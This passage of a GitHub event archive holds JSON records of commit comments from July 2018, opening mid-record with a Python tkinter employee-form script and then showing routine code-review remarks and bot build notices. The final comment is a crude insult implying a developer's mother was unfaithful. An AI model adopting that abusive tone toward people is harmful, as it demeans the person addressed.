ID')\r\ne1=Entry(w1,textvariable=employee_id)\r\nl2=Label(w1,text='EMPLOYEE_NAME')\r\ne2=Entry(w1,textvariable=employee_name)\r\nl3=Label(w1,text='EMPLOYEE_SALARY')\r\ne3=Entry(w1,textvariable=employee_salary)\r\nl4=Label(w1,text='EMPLOYEE_AGE')\r\ne4=Entry(w1,textvariable=employee_age)\r\nl5=Label(w1,text='EMPLOYEE_HIREDATE')\r\ne5=Entry(w1,textvariable=employee_hiredate)\r\nl6=Label(w1,text='EMPLOYEE_ADDRESS')\r\ne6=Entry(w1,textvariable=employee_address)\r\n\r\nb1=Button(w1,text='Search',command=search)\r\nb2=Button(w1,text='Add',command=add)\r\nb3=Button(w1,text='Update',command=update)\r\nb4=Button(w1,text='Delete',command=delete)\r\nb5=Button(w1,text='Clear',command=clear)\r\n\r\nl1.grid(row=1,column=0)\r\ne1.grid(row=1,column=1)\r\nb1.grid(row=1,column=2)\r\nl2.grid(row=2,column=0)\r\ne2.grid(row=2,column=1)\r\nl3.grid(row=3,column=0)\r\ne3.grid(row=3,column=1)\r\nl4.grid(row=4,column=0)\r\ne4.grid(row=4,column=1)\r\nl5.grid(row=5,column=0)\r\ne5.grid(row=5,column=1)\r\nl6.grid(row=6,column=0)\r\ne6.grid(row=6,column=1)\r\n\r\nb2.grid(row=7,column=0)\r\nb3.grid(row=7,column=1)\r\nb4.grid(row=8,column=0)\r\nb5.grid(row=8,column=1)    \r\nw1.mainloop()\r\n        \r\n        \r\n       \r\n"}},"created_at":"2018-07-30T14:41:08Z"}
{"id":"8038160069","type":"CommitCommentEvent","actor":{"login":"dev-harsh1998"},"repo":{"name":"arunassain/android_device_lenovo_karate"},"payload":{"comment":{"id":29887991,"position":null,"line":null,"path":null,"commit_id":"ca96b8eb3322a570e22e4f4a190ae5d38c2e6d0c","created_at":"2018-07-30T14:41:19Z","updated_at":"2018-07-30T14:41:19Z","author_association":"NONE","body":"Dayum That's some Godly code :D !!!!.\r\n\r\nI don't know what you smoke before coding but I would defiantly try it once ! "}},"created_at":"2018-07-30T14:41:19Z"}
{"id":"8038160693","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/projects"},"payload":{"comment":{"id":29887993,"position":19,"line":33,"path":".travis.yml","commit_id":"180400e5f978b6b5a2a7f6542d1f4edb546e5121","created_at":"2018-07-30T14:41:25Z","updated_at":"2018-07-30T14:41:25Z","author_association":"NONE","body":"Keep this here"}},"created_at":"2018-07-30T14:41:25Z"}
{"id":"8038161598","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29887994,"position":null,"line":null,"path":null,"commit_id":"1730f62bdb29d47b296e8923b9f19a77df831055","created_at":"2018-07-30T14:41:34Z","updated_at":"2018-07-30T14:41:34Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-328](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-328).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-328-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-30T14:41:34Z"}
{"id":"8038162330","type":"CommitCommentEvent","actor":{"login":"ehlers"},"repo":{"name":"GNS3/gns3-gui"},"payload":{"comment":{"id":29887995,"position":null,"line":null,"path":null,"commit_id":"dbe73eb8d77c211da78f1dade00eb13c8c3e834a","created_at":"2018-07-30T14:41:40Z","updated_at":"2018-07-30T14:41:40Z","author_association":"CONTRIBUTOR","body":"Two issues:\r\n\r\nYou missed one change:\r\n`if \"boot_priority\" in appliance_config:` must be changed to `if \"boot_priority\" in appliance_config[\"qemu\"]:`\r\n\r\ntest_add_appliance_with_boot_priority() in tests/registry/test_config.py is wrong, it adds/tests the boot_priority in the main level, not in the qemu sub-level."}},"created_at":"2018-07-30T14:41:40Z"}
{"id":"8038164870","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/projects"},"payload":{"comment":{"id":29888006,"position":25,"line":41,"path":".travis.yml","commit_id":"180400e5f978b6b5a2a7f6542d1f4edb546e5121","created_at":"2018-07-30T14:42:03Z","updated_at":"2018-07-30T14:42:03Z","author_association":"NONE","body":"We don't need the check from `coala-docker` anymore as we will use the latest version of `coala`, so remove this"}},"created_at":"2018-07-30T14:42:03Z"}
{"id":"8038169362","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/projects"},"payload":{"comment":{"id":29888016,"position":8,"line":29,"path":".travis.yml","commit_id":"180400e5f978b6b5a2a7f6542d1f4edb546e5121","created_at":"2018-07-30T14:42:44Z","updated_at":"2018-07-30T14:42:44Z","author_association":"NONE","body":"The script `build.sh` in this repository is intended to be ran in `ruby` job and not in coala"}},"created_at":"2018-07-30T14:42:44Z"}
{"id":"8038170180","type":"CommitCommentEvent","actor":{"login":"RsrnlWysxr"},"repo":{"name":"RsrnlWysxr/Data_structures"},"payload":{"comment":{"id":29888017,"position":null,"line":null,"path":null,"commit_id":"4bc143abc468c021082699f8bc47b946c6133ab7","created_at":"2018-07-30T14:42:52Z","updated_at":"2018-07-30T14:42:52Z","author_association":"OWNER","body":"动态数组"}},"created_at":"2018-07-30T14:42:52Z"}
{"id":"8038170306","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/projects"},"payload":{"comment":{"id":29888018,"position":19,"line":33,"path":".travis.yml","commit_id":"180400e5f978b6b5a2a7f6542d1f4edb546e5121","created_at":"2018-07-30T14:42:53Z","updated_at":"2018-07-30T14:42:53Z","author_association":"NONE","body":"(Add it again)"}},"created_at":"2018-07-30T14:42:53Z"}
{"id":"8038173506","type":"CommitCommentEvent","actor":{"login":"jhyunleehi"},"repo":{"name":"jhyunleehi/SW"},"payload":{"comment":{"id":29888022,"position":null,"line":null,"path":null,"commit_id":"c34a0604d05aa4ae8de5ee3b8b9b12a7d1f6a549","created_at":"2018-07-30T14:43:23Z","updated_at":"2018-07-30T14:43:23Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-30T14:43:23Z"}
{"id":"8038173784","type":"CommitCommentEvent","actor":{"login":"davidlenz"},"repo":{"name":"davidlenz/pvtm-core"},"payload":{"comment":{"id":29888023,"position":null,"line":null,"path":null,"commit_id":"66cb802f4a2575a0676145e3d6b30ccf9d313e8a","created_at":"2018-07-30T14:43:25Z","updated_at":"2018-07-30T14:43:25Z","author_association":"OWNER","body":"The code block and the link seem to still be not working correctly`?"}},"created_at":"2018-07-30T14:43:25Z"}
{"id":"8038176770","type":"CommitCommentEvent","actor":{"login":"leseb"},"repo":{"name":"ceph/ceph"},"payload":{"comment":{"id":29888028,"position":7,"line":57,"path":"src/common/common_init.cc","commit_id":"59ee2e8d3b14511e8d07ef8325ac8ca96e051784","created_at":"2018-07-30T14:43:52Z","updated_at":"2018-07-30T14:43:52Z","author_association":"CONTRIBUTOR","body":"Is there any reason for using `$ccitd` here? Doesn't `$pid` make the instance unique already?\r\nThis new line makes it hard for monitoring tools to predict the socket name, the same goes when restarting a container service and looking for a socket to validate a successful restart.\r\nThanks!"}},"created_at":"2018-07-30T14:43:52Z"}
{"id":"8038178050","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/projects"},"payload":{"comment":{"id":29888034,"position":9,"line":30,"path":".travis.yml","commit_id":"180400e5f978b6b5a2a7f6542d1f4edb546e5121","created_at":"2018-07-30T14:44:05Z","updated_at":"2018-07-30T14:44:05Z","author_association":"NONE","body":"Move line 30-32 to install the install section\r\nand also you could do\r\n```\r\ninstall:\r\n    - BEARS_ZIP...\r\n    - curl....\r\n    - pip...\r\n```"}},"created_at":"2018-07-30T14:44:05Z"}
{"id":"8038178128","type":"CommitCommentEvent","actor":{"login":"bobcat13"},"repo":{"name":"onhan/guess_number"},"payload":{"comment":{"id":29888035,"position":null,"line":null,"path":null,"commit_id":"b703cd446939ccde4e584ba109556ecd17718e71","created_at":"2018-07-30T14:44:06Z","updated_at":"2018-07-30T14:44:06Z","author_association":"NONE","body":"your code is failed, you must commit only working code"}},"created_at":"2018-07-30T14:44:06Z"}
{"id":"8038179769","type":"CommitCommentEvent","actor":{"login":"bbferka"},"repo":{"name":"MirrorIce/robosherlock"},"payload":{"comment":{"id":29888039,"position":17,"line":108,"path":"src/flowcontrol/include/rs/flowcontrol/RSAnalysisEngine.h","commit_id":"15884c0ba0c49a985e30520de93d38d620569044","created_at":"2018-07-30T14:44:20Z","updated_at":"2018-07-30T14:44:20Z","author_association":"NONE","body":"so it does not matter what the param is, \"config_mongodb_playback_utest.ini\" is going to be set ?"}},"created_at":"2018-07-30T14:44:20Z"}
{"id":"8038181205","type":"CommitCommentEvent","actor":{"login":"tklengyel"},"repo":{"name":"tklengyel/xenclient-oe"},"payload":{"comment":{"id":29888048,"position":14,"line":187,"path":"recipes-openxt/openxt/openxt-measuredlaunch/seal-system","commit_id":"a24d0a021c447121d2bb28cf2460177d0091badf","created_at":"2018-07-30T14:44:33Z","updated_at":"2018-07-30T14:44:33Z","author_association":"OWNER","body":"Right, there is a mismatch (the patch hasn't been tested yet). I'm still going back-and-forth on which PCR is the right location for these to be measured in but I think PCR8 will be the pick as that conforms more to the UEFI spec."}},"created_at":"2018-07-30T14:44:33Z"}
{"id":"8038182329","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/thf-cms"},"payload":{"comment":{"id":29888052,"position":null,"line":null,"path":null,"commit_id":"1c6fc4395d1aea78c52dd34da7c2aa0ded607ecf","created_at":"2018-07-30T14:44:44Z","updated_at":"2018-07-30T14:44:44Z","author_association":"MEMBER","body":"Created multidev environment [thf-cms#ci-21](https://dashboard.pantheon.io/sites/25812cb4-ea8c-436b-ac17-09b0c2b7598b#ci-21).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-21-thf-cms.pantheonsite.io/)"}},"created_at":"2018-07-30T14:44:44Z"}
{"id":"8038182549","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/projects"},"payload":{"comment":{"id":29888053,"position":9,"line":30,"path":".travis.yml","commit_id":"180400e5f978b6b5a2a7f6542d1f4edb546e5121","created_at":"2018-07-30T14:44:46Z","updated_at":"2018-07-30T14:44:46Z","author_association":"NONE","body":"and the `script` section of this job would be just `coala --ci`"}},"created_at":"2018-07-30T14:44:46Z"}
{"id":"8038187560","type":"CommitCommentEvent","actor":{"login":"werkraum-admin"},"repo":{"name":"clickstorm/cs_seo"},"payload":{"comment":{"id":29888070,"position":null,"line":null,"path":null,"commit_id":"663df85f66819d9d26541e73ada82f07eb6b3db9","created_at":"2018-07-30T14:45:32Z","updated_at":"2018-07-30T14:45:32Z","author_association":"CONTRIBUTOR","body":"I think you have a wrong namespace here \"In2code\\Powermail\", is this intended ?\r\nIt currently breaks my dev site :("}},"created_at":"2018-07-30T14:45:32Z"}
{"id":"8038191074","type":"CommitCommentEvent","actor":{"login":"h3x4crypt"},"repo":{"name":"h3x4cryptor/framework"},"payload":{"comment":{"id":29888081,"position":null,"line":null,"path":null,"commit_id":"3ea795970b881bb4ec6222aa39fe994766c9a202","created_at":"2018-07-30T14:46:04Z","updated_at":"2018-07-30T14:46:04Z","author_association":"CONTRIBUTOR","body":"to be submitted..."}},"created_at":"2018-07-30T14:46:04Z"}
{"id":"8038191896","type":"CommitCommentEvent","actor":{"login":"bbferka"},"repo":{"name":"MirrorIce/robosherlock"},"payload":{"comment":{"id":29888086,"position":17,"line":108,"path":"src/flowcontrol/include/rs/flowcontrol/RSAnalysisEngine.h","commit_id":"15884c0ba0c49a985e30520de93d38d620569044","created_at":"2018-07-30T14:46:12Z","updated_at":"2018-07-30T14:46:12Z","author_association":"NONE","body":"try setting some param in NormalEstimatort: e.g. radiusSearch (a float), useRGB(a bool) and reconfigure (you will need to implement the reconfigure functionin NormalEstimator (take a look at CollectionReader for an example)"}},"created_at":"2018-07-30T14:46:12Z"}
{"id":"8038192205","type":"CommitCommentEvent","actor":{"login":"mustardgnome"},"repo":{"name":"Meshiest/ocaml-rpg"},"payload":{"comment":{"id":29888089,"position":null,"line":null,"path":null,"commit_id":"da9df29334c32796e317c471d616b1db6625f943","created_at":"2018-07-30T14:46:14Z","updated_at":"2018-07-30T14:46:14Z","author_association":"NONE","body":"owie"}},"created_at":"2018-07-30T14:46:14Z"}
{"id":"8038194743","type":"CommitCommentEvent","actor":{"login":"kaetze66"},"repo":{"name":"kaetze66/tb_pysd"},"payload":{"comment":{"id":29888095,"position":null,"line":null,"path":null,"commit_id":"aa5c49391baa1b2a919166512b58735d61c132ad","created_at":"2018-07-30T14:46:37Z","updated_at":"2018-07-30T14:46:37Z","author_association":"OWNER","body":"correction: is version 0.3"}},"created_at":"2018-07-30T14:46:37Z"}
{"id":"8038196793","type":"CommitCommentEvent","actor":{"login":"kaetze66"},"repo":{"name":"kaetze66/tb_pysd"},"payload":{"comment":{"id":29888099,"position":null,"line":null,"path":null,"commit_id":"0112b0bd30d33bc23f10950f3890be8b14b740d4","created_at":"2018-07-30T14:46:56Z","updated_at":"2018-07-30T14:46:56Z","author_association":"OWNER","body":"correction: is version 0.3"}},"created_at":"2018-07-30T14:46:56Z"}
{"id":"8038196886","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29888100,"position":22,"line":46,"path":"source/js/plugins/metadata.js","commit_id":"8afdf0ea5aa8c022336d42172678ec6bb06ee463","created_at":"2018-07-30T14:46:57Z","updated_at":"2018-07-30T14:46:57Z","author_association":"MEMBER","body":"Why are these uppercased?"}},"created_at":"2018-07-30T14:46:57Z"}
{"id":"8038197799","type":"CommitCommentEvent","actor":{"login":"zarac"},"repo":{"name":"zarac/transmission"},"payload":{"comment":{"id":29888101,"position":null,"line":null,"path":null,"commit_id":"3799bcee9b8dbc90532737c5a9502bf6acd8ca48","created_at":"2018-07-30T14:47:07Z","updated_at":"2018-07-30T14:47:07Z","author_association":"OWNER","body":"Why doesn't `.. | sort ..` work now? Because sometimes fields include spaces which makes it impractical since there is no proper delimiter. E.g. the \"Have\" field can look like \"12.34 MB\" or \"None\".\r\n\r\nPerhaps STX characters should be inserted before all fields to allow sorting on e.g. \"Ratio\" or \"Status\" as well. I.e. .... printf(\"%4d%c  \\x2%4s  \\x2%9s  \\x2%-8s  \\x2%6.1f  \\x2%6.1f  \\x2%5s  \\x2%-11s  \\x2%s\\n\", ....\r\n\r\nPS. I'm not sure what STX is usually used for so i'm unaware of possible side effects / conflicts. "}},"created_at":"2018-07-30T14:47:07Z"}
{"id":"8038200089","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29888103,"position":4,"line":70,"path":"xwiki-platform-core/xwiki-platform-activitystream/xwiki-platform-activitystream-ui/pom.xml","commit_id":"ac297d966780d5aa953c883f735cb04ebde3cef7","created_at":"2018-07-30T14:47:28Z","updated_at":"2018-07-30T14:47:28Z","author_association":"MEMBER","body":"> I like having empty new lines in files to separate things\r\n\r\nYes me too but for Java since that's part of best practices.\r\n\r\nHowever for XML it's another matter.\r\n\r\nAnyway I'll send a mail on the devs list in the near future about this (if someone else doesn't do it when I'm on holidays ;))."}},"created_at":"2018-07-30T14:47:28Z"}
{"id":"8038200660","type":"CommitCommentEvent","actor":{"login":"Shivasai6"},"repo":{"name":"ShuvenduBikash/Blood-Bank"},"payload":{"comment":{"id":29888104,"position":null,"line":null,"path":null,"commit_id":"4501bd036c8db57e5157d238f6ad00bb4368ad6d","created_at":"2018-07-30T14:47:33Z","updated_at":"2018-07-30T14:47:33Z","author_association":"NONE","body":"Bro how to access firebase in this project?\r\n"}},"created_at":"2018-07-30T14:47:33Z"}
{"id":"8038200996","type":"CommitCommentEvent","actor":{"login":"dn1231"},"repo":{"name":"phone2action/testcafe-cucumber"},"payload":{"comment":{"id":29888106,"position":null,"line":null,"path":null,"commit_id":"b962856f67155bd02f5b14c06d52f662f2badd08","created_at":"2018-07-30T14:47:36Z","updated_at":"2018-07-30T14:47:36Z","author_association":"NONE","body":"why do we need to add 60 secs of timeout?\r\n"}},"created_at":"2018-07-30T14:47:36Z"}
{"id":"8038203998","type":"CommitCommentEvent","actor":{"login":"lunarraid"},"repo":{"name":"squaretwo/react-native-applovin-event-tracker"},"payload":{"comment":{"id":29888115,"position":38,"line":51,"path":"android/src/main/java/com/squaretwo/applovin/eventtracker/RNApplovinEventTrackerModule.java","commit_id":"061bf1059c1d65a302473e40df96647fc3d01be5","created_at":"2018-07-30T14:48:03Z","updated_at":"2018-07-30T14:48:03Z","author_association":"NONE","body":"There is no guarantee here that this intent is a purchase intent, and requires that the app send a separate event to this library immediately following data received. We shouldn't make any assumptions about this. I really think we should add in native IAP listener code for both android and iOS, so that this can handle IAP from any source, not just the two modules we are using, and not require the app itself to manually send IAP events."}},"created_at":"2018-07-30T14:48:03Z"}
{"id":"8038205648","type":"CommitCommentEvent","actor":{"login":"jandryuk"},"repo":{"name":"tklengyel/xenclient-oe"},"payload":{"comment":{"id":29888120,"position":14,"line":187,"path":"recipes-openxt/openxt/openxt-measuredlaunch/seal-system","commit_id":"a24d0a021c447121d2bb28cf2460177d0091badf","created_at":"2018-07-30T14:48:18Z","updated_at":"2018-07-30T14:48:18Z","author_association":"NONE","body":"Understood.  I noticed the mismatch and just want to help."}},"created_at":"2018-07-30T14:48:18Z"}
{"id":"8038208108","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29888123,"position":null,"line":null,"path":null,"commit_id":"7a9216c608db20c45e5facb779701e6e0162f393","created_at":"2018-07-30T14:48:42Z","updated_at":"2018-07-30T14:48:42Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [show dataset on the page of Data Manager.](https://trello.com/c/sj2b5v7f/54-show-dataset-on-the-page-of-data-manager)"}},"created_at":"2018-07-30T14:48:42Z"}
{"id":"8038209198","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29888126,"position":null,"line":null,"path":null,"commit_id":"84da0d558270a4cef269a86b3bf42d0c83bc4faa","created_at":"2018-07-30T14:48:51Z","updated_at":"2018-07-30T14:48:51Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [show dataset on the page of Data Manager.](https://trello.com/c/sj2b5v7f/54-show-dataset-on-the-page-of-data-manager)"}},"created_at":"2018-07-30T14:48:51Z"}
{"id":"8038209587","type":"CommitCommentEvent","actor":{"login":"c-osanai"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29888129,"position":19,"line":19,"path":"screen/test01.html","commit_id":"769893412adf24e60c3c9f7424cfe2b019d24e5d","created_at":"2018-07-30T14:48:55Z","updated_at":"2018-07-30T14:48:55Z","author_association":"OWNER","body":"jQuery オブジェクトの appendToメソッド です"}},"created_at":"2018-07-30T14:48:55Z"}
{"id":"8038210249","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29888131,"position":null,"line":null,"path":null,"commit_id":"38af93415b7746b4735a208cced9a99ab55bb49c","created_at":"2018-07-30T14:49:02Z","updated_at":"2018-07-30T14:49:02Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [show dataset on the page of Data Manager.](https://trello.com/c/sj2b5v7f/54-show-dataset-on-the-page-of-data-manager)"}},"created_at":"2018-07-30T14:49:02Z"}
{"id":"8038210938","type":"CommitCommentEvent","actor":{"login":"night1ightning"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29888132,"position":5,"line":5,"path":"listen2/populate_hash_of_vowels.rb","commit_id":"c2206297695794b0b77b98b2658c06e9a0f196ba","created_at":"2018-07-30T14:49:09Z","updated_at":"2018-07-30T14:49:09Z","author_association":"OWNER","body":"Нет, вы не правы, тогда будут не все русские буквы.\r\nС английскими прокатит, с русскими, не все."}},"created_at":"2018-07-30T14:49:09Z"}
{"id":"8038212707","type":"CommitCommentEvent","actor":{"login":"ChebotarDmytro"},"repo":{"name":"ChebotarDmytro/study"},"payload":{"comment":{"id":29888137,"position":3,"line":4,"path":"sergiy.cpp","commit_id":"97c6efe677274941051facc3c5f3b01d731180c7","created_at":"2018-07-30T14:49:24Z","updated_at":"2018-07-30T14:49:24Z","author_association":"OWNER","body":"bdfg"}},"created_at":"2018-07-30T14:49:24Z"}
{"id":"8038214200","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29888142,"position":4,"line":70,"path":"xwiki-platform-core/xwiki-platform-activitystream/xwiki-platform-activitystream-ui/pom.xml","commit_id":"ac297d966780d5aa953c883f735cb04ebde3cef7","created_at":"2018-07-30T14:49:38Z","updated_at":"2018-07-30T14:49:38Z","author_association":"MEMBER","body":"Just to be clear, I'm more interested in us having a common practice for this than using one way or another. What's important is that if we define a practice that it's clearly defined and understood so that we don't go back and forth adding and removing new lines."}},"created_at":"2018-07-30T14:49:38Z"}
{"id":"8038214679","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29888144,"position":null,"line":null,"path":null,"commit_id":"ce033af8f4259cfbe8521101fae6293bb218c3c8","created_at":"2018-07-30T14:49:42Z","updated_at":"2018-07-30T14:49:42Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2994 of 2994 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ce033af8f4259cfbe8521101fae6293bb218c3c8-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ce033af8f4259cfbe8521101fae6293bb218c3c8-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-30T14:49:42Z"}
{"id":"8038214801","type":"CommitCommentEvent","actor":{"login":"ChebotarDmytro"},"repo":{"name":"ChebotarDmytro/study"},"payload":{"comment":{"id":29888145,"position":3,"line":4,"path":"sergiy.cpp","commit_id":"97c6efe677274941051facc3c5f3b01d731180c7","created_at":"2018-07-30T14:49:44Z","updated_at":"2018-07-30T14:49:44Z","author_association":"OWNER","body":"gdfgf\r\n"}},"created_at":"2018-07-30T14:49:44Z"}
{"id":"8038215571","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29888148,"position":35,"line":58,"path":"source/js/plugins/metadata.js","commit_id":"8afdf0ea5aa8c022336d42172678ec6bb06ee463","created_at":"2018-07-30T14:49:50Z","updated_at":"2018-07-30T14:49:50Z","author_association":"MEMBER","body":"use `createElement` for `b` tags and set their inner text. \r\n\r\nhttps://howchoo.com/g/mmu0nguznjg/learn-the-slow-and-fast-way-to-append-elements-to-the-dom"}},"created_at":"2018-07-30T14:49:50Z"}
{"id":"8038216739","type":"CommitCommentEvent","actor":{"login":"ChebotarDmytro"},"repo":{"name":"ChebotarDmytro/study"},"payload":{"comment":{"id":29888152,"position":4,"line":5,"path":"sergiy.cpp","commit_id":"97c6efe677274941051facc3c5f3b01d731180c7","created_at":"2018-07-30T14:50:01Z","updated_at":"2018-07-30T14:50:01Z","author_association":"OWNER","body":"gregr"}},"created_at":"2018-07-30T14:50:01Z"}
{"id":"8038217049","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29888154,"position":null,"line":null,"path":null,"commit_id":"688a465092007b105dd3481d0c6d1ba7ba91f45a","created_at":"2018-07-30T14:50:03Z","updated_at":"2018-07-30T14:50:03Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-330](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-330).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-330-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-30T14:50:03Z"}
{"id":"8038219546","type":"CommitCommentEvent","actor":{"login":"ThomasAbballe"},"repo":{"name":"Alneos/vega"},"payload":{"comment":{"id":29888162,"position":null,"line":null,"path":null,"commit_id":"836983f95aa9be7a527f5bee5de5309cb57ac1ec","created_at":"2018-07-30T14:50:24Z","updated_at":"2018-07-30T14:50:24Z","author_association":"COLLABORATOR","body":"I have two errors when building this version : \r\n\r\n> [ 25%] Building CXX object Abstract/CMakeFiles/abstract.dir/SolverInterfaces.cpp.o\r\nAbstract/Loading.cpp: In member function ‘virtual const vega::VectorialValue vega::StaticPressure::getForceInGlobalCS(int) const’:\r\nAbstract/Loading.cpp:445:35: error: unused variable ‘v23’ [-Werror=unused-variable]\r\n             const VectorialValue& v23 = VectorialValue(node3.x, node3.y, node3.z) - VectorialValue(node2.x, node2.y, node2.z);\r\n\r\n\r\nFor the first one, I don't really know what we are computing, but we indeed are defining a vector which we don't use after. Is there a mistake here, some copy/paste, for example ?\r\n\r\n> Abstract/Model.cpp: In member function ‘void vega::Model::removeUnassignedMaterials()’:\r\nAbstract/Model.cpp:1122:16: error: unused variable ‘material’ [-Werror=unused-variable]\r\n     for (auto& material : materials) {\r\n\r\nThe second one is a inattention error: the content of the while loop was commented, but not the loop itself. I'll comment it.\r\n\r\nIt's strange that it passes all compilation tests:  `-Werror=unused-variable` is our default compilation, no ?"}},"created_at":"2018-07-30T14:50:24Z"}
{"id":"8038220157","type":"CommitCommentEvent","actor":{"login":"liewegas"},"repo":{"name":"ceph/ceph"},"payload":{"comment":{"id":29888163,"position":7,"line":57,"path":"src/common/common_init.cc","commit_id":"59ee2e8d3b14511e8d07ef8325ac8ca96e051784","created_at":"2018-07-30T14:50:29Z","updated_at":"2018-07-30T14:50:29Z","author_association":"MEMBER","body":"You can have multiple librados instances in a the same process.  Key example is qemu, which has one per volume, IIRC."}},"created_at":"2018-07-30T14:50:29Z"}
{"id":"8038220663","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29888164,"position":5,"line":28,"path":"tests/TicTacToeTest.php","commit_id":"cbdb6846766137c371be845c5e499a8c786f710e","created_at":"2018-07-30T14:50:33Z","updated_at":"2018-07-30T14:50:33Z","author_association":"NONE","body":"Lines like this won't work. Game cannot possibly return the same object created on this line.\r\n\r\nA better solution would be to return null when there is no winner. "}},"created_at":"2018-07-30T14:50:33Z"}
{"id":"8038221651","type":"CommitCommentEvent","actor":{"login":"night1ightning"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29888166,"position":11,"line":11,"path":"listen2/populate_hash_of_vowels.rb","commit_id":"c2206297695794b0b77b98b2658c06e9a0f196ba","created_at":"2018-07-30T14:50:42Z","updated_at":"2018-07-30T14:50:42Z","author_association":"OWNER","body":"дни месяца, месяц содержит количество дней, все логично."}},"created_at":"2018-07-30T14:50:42Z"}
{"id":"8038224927","type":"CommitCommentEvent","actor":{"login":"atallahade"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29888178,"position":4,"line":70,"path":"xwiki-platform-core/xwiki-platform-activitystream/xwiki-platform-activitystream-ui/pom.xml","commit_id":"ac297d966780d5aa953c883f735cb04ebde3cef7","created_at":"2018-07-30T14:51:13Z","updated_at":"2018-07-30T14:51:13Z","author_association":"CONTRIBUTOR","body":"Sure, having constistency is important."}},"created_at":"2018-07-30T14:51:13Z"}
{"id":"8038225396","type":"CommitCommentEvent","actor":{"login":"grossmj"},"repo":{"name":"GNS3/gns3-gui"},"payload":{"comment":{"id":29888179,"position":null,"line":null,"path":null,"commit_id":"dbe73eb8d77c211da78f1dade00eb13c8c3e834a","created_at":"2018-07-30T14:51:17Z","updated_at":"2018-07-30T14:51:17Z","author_association":"MEMBER","body":"You have been faster than Travis ;)"}},"created_at":"2018-07-30T14:51:17Z"}
{"id":"8038227565","type":"CommitCommentEvent","actor":{"login":"ilpincy"},"repo":{"name":"ilpincy/argos3"},"payload":{"comment":{"id":29888184,"position":null,"line":null,"path":null,"commit_id":"1e96147df00e4d12645b4bcd78c13ce2c75f99f4","created_at":"2018-07-30T14:51:35Z","updated_at":"2018-07-30T14:51:35Z","author_association":"OWNER","body":"Will do - my suggestion is turn on email notifications, so you're always informed when something changes :-)"}},"created_at":"2018-07-30T14:51:35Z"}
{"id":"8038229117","type":"CommitCommentEvent","actor":{"login":"dev-harsh1998"},"repo":{"name":"arunassain/android_kernel_lenovo_karate"},"payload":{"comment":{"id":29888188,"position":null,"line":null,"path":null,"commit_id":"02311a454155e7c2c7b727a464ecdfc0f1399610","created_at":"2018-07-30T14:51:48Z","updated_at":"2018-07-30T14:51:48Z","author_association":"NONE","body":"While your dad was away on border for fighting wars for 4 years and you were born!! This was what exactly your mama said on call when he asked whether I got a boy or girl. "}},"created_at":"2018-07-30T14:51:48Z"}
